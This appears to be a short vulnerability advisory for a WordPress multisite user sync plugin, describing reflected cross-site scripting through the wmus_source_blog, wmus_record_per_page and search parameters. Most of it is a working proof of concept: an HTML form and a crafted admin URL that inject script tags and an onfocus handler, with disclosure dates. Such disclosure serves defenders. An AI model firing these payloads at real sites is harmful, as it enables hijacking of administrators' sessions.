The plugin does not sanitise and escape the wmus_source_blog and wmus_record_per_page parameters before outputting them back in attributes, leading to Reflected Cross-Site Scripting issues
<html>
<body>
<form action="https://example.com/wp-admin/network/admin.php?page=wmus" method="POST">
<input type="hidden" name="wmus_source_blog" value='1"><script>alert(/XSS-source_blog/)</script>' />
<input type="hidden" name="wmus_record_per_page" value='10"><script>alert(/XSS-record/)</script>' />
<input type="hidden" name="submit" value="Filter" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
https://example.com/wp-admin/network/admin.php?page=wmus&s=lxk1g%22+onfocus%3Dalert%281%29+autofocus%3D+xaycjmgr032&wmus_source_blog=1&wmus_record_per_page=12&wmus_sync_unsync=1&wmus_destination_blogs%5B0%5D=2&wmus_destination_blogs%5B1%5D=3&wmus_destination_blogs%5B2%5D=4&wmus_destination_blogs%5B3%5D=5&submit=Sync%2FUnsync
2022-02-07 (about 1 years ago)
2022-02-07 (about 1 years ago)
2023-04-12 (about 1 months ago)